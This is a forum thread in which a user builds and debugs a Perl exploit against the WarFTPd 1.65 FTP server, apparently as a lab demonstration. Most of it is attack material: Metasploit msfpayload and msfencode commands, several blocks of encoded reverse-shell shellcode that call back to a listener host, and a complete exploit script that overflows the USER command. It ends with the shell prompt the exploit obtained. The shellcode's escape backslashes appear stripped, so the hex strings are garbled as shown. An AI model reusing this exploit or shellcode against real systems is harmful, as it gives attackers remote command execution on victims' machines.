question about building a perl exploit using metasploit

[apollo]

I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue.  Hopefully someone can tell me where I went wrong in this process.

The exploit I wanted to demo warftpd 1.65 since theres a whole lot of stuff out there already on it.  Looking at the metasploit module :
exploit/windows/ftp/warftpd_165_user I find that

'BadChars' => "x00x0ax0dx40",

'Ret'      => 0x71ab1d54  # for XP SP0

Now, using the msf tools, I generate the exploit code:

~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b  'x00x0ax0dx40' -t perl

[*] x86/shikata_ga_nai succeeded, final size 205



"xbdx69x9ex09x95xdbxcaxd9x74x24xf4x33xc9xb1" .

"x2dx58x31x68x14x83xe8xfcx03x68x10x8bx6bxf5" .

"xffxa0xd3xeexf9xc9x23x11x99x04x07x65x27x5a" .

"x3cx06xe5xdax43x18x9ex4dx64xe7x4bxfax50x7d" .

"x8ax12xa9x41x14x46x0bx8bx2ax97x4ex88xf5xe2" .

"xb8xd2x93x35x8fxa0xb8x0ex84x04x1bx91x73xfc" .

"xe8x8dxdax8axa0xb1xddx65x3dxe5x44xfcx2exd1" .

"x6ax9ex51xf9xa2xbbxcax72x87x0bx98xc4x04xe7" .

"xeexd8xb9x7cx66xe8x9fxe4x24x8ex77xdaxf8x26" .

"xffx6fxcfxe9xabxe9x96x67x34x09x3ex12xe7xa6" .

"xecx4fx4bx1ax50x3cxc2x7bx30x43x3bx8bxbfx14" .

"x97xeax06x7dxc8x0cxaexe7x4ex5ax20x18x66x0c" .

"xd7x26x2fx01xa9xc0x58x77xf5x6axcaxfexe6x18" .

"xfcx53xbexbax45x04x45xbdx60xfbxf1x4dxddxaf" .

"xaex1exbbxf6x91x98xbcxefx18";

and then I incorporate all of that into the perl exploit

#!/usr/bin/perl

use IO::Socket;



my $sock = new IO::Socket::INET (

                PeerAddr => "192.168.50.128",

                PeerPort =>"21",

                Proto => "tcp",

                );

$trash = <$sock>;

$str = "USER " . "A"x485 ."x54x1dxabx71" . "x41"x115 ;

$str .= "x29xc9xb1x2dxdaxc5xb8x0bxe6x4fx25xd9x74x24" .

"xf4x5ex31x46x15x03x46x15x83xc6x04xe9x13xb3" .

"x4fx06x9cxa4x69x27xdcxcaxeaxe6xf8xbex96x34" .

"x74xbcx55x3cx8bxd2x2dxebxabx2dxd8x98x98xb7" .

"x1dx70xd1x07x84x20xd3x42xbax39x16xd6x05x4c" .

"x60x94xe3x97x46x6ex0fxacxddxdexebx33x0bx86" .

"x78x2fx92xccx30x53x25x3axcdx47xbcx35xbexb3" .

"xa2x24xc0x5bxebx7dx5ax10x4fxb2x28x66x5cx39" .

"x5ex7axf1xb6xf7x8ax57xafx54xecx0fx1cx69x98" .

"xb8x11xbfx07x13xb0x06xc5xfbxc3xafxbcxafx68" .

"x03xedx0cxdcxe0x42x1ax05x80xe5xf3xc2x4fxb2" .

"x58xb5xf6xdbx80xc6xdfx45x86x91x8fx76x2ex76" .

"x27x48x67x4bx39x2ex10xbdx65xc8xb3x34x76x7e" .

"x24x14x2ex18xfdxcdxd5x1bx2bxa1x61xefx84x11" .

"xddxbcx42x2fx21x7ax74xa9xa8";

print $sock $str . "rn";

$trash = <$sock>;

print $sock "pass test rn";

The exploit is lauched when I run it, my listener gets a connection back, however it doesn’t appear that cmd.exe is ever spawned and as soon as I send anything on the connection back the application crashes.  When I do it from within metasploit it works great, so I feel comfortable that this is something that I’m doing wrong.

Thanks in advance for any insight.

[apollo]

I figured I’d post back my solution in case anyone was interested, or in case anyone finds this via google (I was suprised that when i searched for msfencode and 2008 after < 24 hrs this was like the 5th entry on google).  I'm not sure why I didn't think about it, but the multi stage payload was the problem.  When I switched to using a single staged payload, that fixed the problem. 

I punted and went and built the payload in executable form:

~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 x > exp.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/shell/reverse_tcp

Length: 177

Options: exitfunc=process,lhost=192.168.50.129,lport=4444

But.. when I went to run exp.exe on the vulnerable machine.. it crashed, which is what brought me back to the single stage.  Anyway.. I got success with the windows/shell_reverse_tcp payload.

~/metasploit$ ./msfpayload windows/shell_reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r |./msfencode  -s 414 -b 'x00x0ax0dx40' -t perl

[*] x86/shikata_ga_nai succeeded, final size 315



"xd9xe1x33xc9xd9x74x24xf4xb1x49x5axbfx33x3a" .

"x88xc8x31x7ax17x83xeaxfcx03x49x29x6ax3dx51" .

"x27x81xf3x41x41xaaxf3x6exd2xdex60xb4x37x6a" .

"x3dx88xbcx10xbbx88xc3x07x48x27xdcx5cx10x97" .

"xddx89xe6x5cxe9xc6xf8x8cx23x19x63xfcxc0x59" .

"xe0xfbx09x93x04x02x48xcfxe3x3fx18x34x24x4a" .

"x45xbfx6bx90x84x2bxf5x53x8axe0x71x3cx8fxf7" .

"x6exc1x83x7cxf9xa9xffx9ex9bxf2x31x44x3fx7f" .

"x72x4ax4bx3fx79x21x3bxa3x2cxbexfcxd3x70xa9" .

"x72xadx82xc5xdbxcex4dx73x8fx56x1ax4fx1dxfe" .

"xadxdcx53xa1x05xdcx44x35x6dxcfx99xfex21xef" .

"xb4x5fx4bxeax5fxdexa6xfdx9dxb5x52xfcx5exe5" .

"xcbxd9xa8xf0xa1x8dx55x2cxeax62xf9x83x4exd6" .

"xbex70xaex08x28xb6xf8x9bx28x50x91xcax76xfa" .

"x32x64x67x97xddx9ax91x3dx7dx34x9dx97x14xaa" .

"x30x42x16x1axd4x06x8cxfdx71xb5x21x68xd2x60" .

"x93xa0x5bx75x89x7cxd5x9bx7fxbdx16xf1x15xb4" .

"x24xfbx54xeax28x41x75x79xaex7dx2ex2axe4x15" .

"x42xd3x48xf3x5dx5ex87x04x77xfax80xa8x29xac" .

"x7fx26xcbx1fxd1xe3x9ax60x01x63xb0x46xa7xbd" .

"x99x87x7ex2bxe1x87x48x54xcdx10x50xd3x28x99" .

"x61x56xb1xa5x48x67xcexa5x8ax47x59x28xadx85" .

"xe9x87xb2x9fxf1xf8x47";

Which brought me back to final code which worked..

#!/usr/bin/perl

use IO::Socket;



my $sock = new IO::Socket::INET (

                PeerAddr => "192.168.50.128",

                PeerPort =>"21",

                Proto => "tcp",

                );

$str = "USER " . "x90"x485 ."x54x1dxabx71" . "x90"x115 ;

$str .= "xb8x84x3bx15xf2xdaxdbxd9x74x24xf4x31xc9xb1" .

"x49x5ax83xeaxfcx31x42x0ex03xc6x35xf7x07x3a" .

"x23x1cxaax2ax4dx1dxcax55xcex69x59x8dx2bxe5" .

"xe7xf1xb8x85xe2x71xbex9ax66xcexd8xefx26xf0" .

"xd9x04x91x7bxedx51x23x95x3fxa6xbdxc5xc4xe6" .

"xcax12x04x2cx3fx1dx44x5axb4x26x1cxb9x1dx2d" .

"x79x4ax02xe9x80xa6xdbx7ax8ex73xafx23x93x82" .

"x44xd8x87x0fx13xb2xf3x13x45x89xcdxf0xe1x86" .

"x6dx37x61xd8x7dxbcx05xc4xd0x49xa5xfcx74x26" .

"xa8xb2x86x5axe4xb5x41xc4x56x2fx06x3ax6bxc7" .

"xa1x4fxb9x48x1ax4fx6dx1ex69x42x72xe5x3dx62" .

"x5dx46x37x79x04xf9xaax8axcbxacx5ex89x34x9e" .

"xf7x54xc3xebxa5x30x2bxc5xe5xedx80xbax4ax41" .

"x64x6fxb2xb5x02x4fxe4x04x52x29x9dx79x08xd3" .

"x0exf3x51x8exd9xefx6bx1ax79xa7x74x8cx10x57" .

"xdax65x1ax87xbaxefx80x4ex2bx8cx25xe5xfbx0b" .

"x9fx35x72x4cxb5x81x0cx70x7bxcaxfcxdexe9x43" .

"xffxe0x50x79xfex5ex79x0cx84x66x2axa5xd2xfe" .

"x5ex44x97xe8x61xcdxf0xebx48x75x56x41x24xdb" .

"x09x0fxc7x8axf8x9ax96xd3x2bx4cxb4xf5xc9x42" .

"x95xfax04x30xe5xfax9ex3bxc9x6dx06xbax2cx14" .

"x37x49xb5x18x11x4exc2x1ax61x60x45x9dx46x62" .

"xe5x32x88xb4xf5x65x7c";

print $sock $str . "rn";

and then…. tada!

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:Program FilesWar-ftpd>

[KrisTeason]

Nice work.

[Anonymous]

that makes sense since there was no payload handler in place

[RoleReversal]

Nicely done Apollo

and thanks for posting the solution aswell as the problem.

[Author]

Posts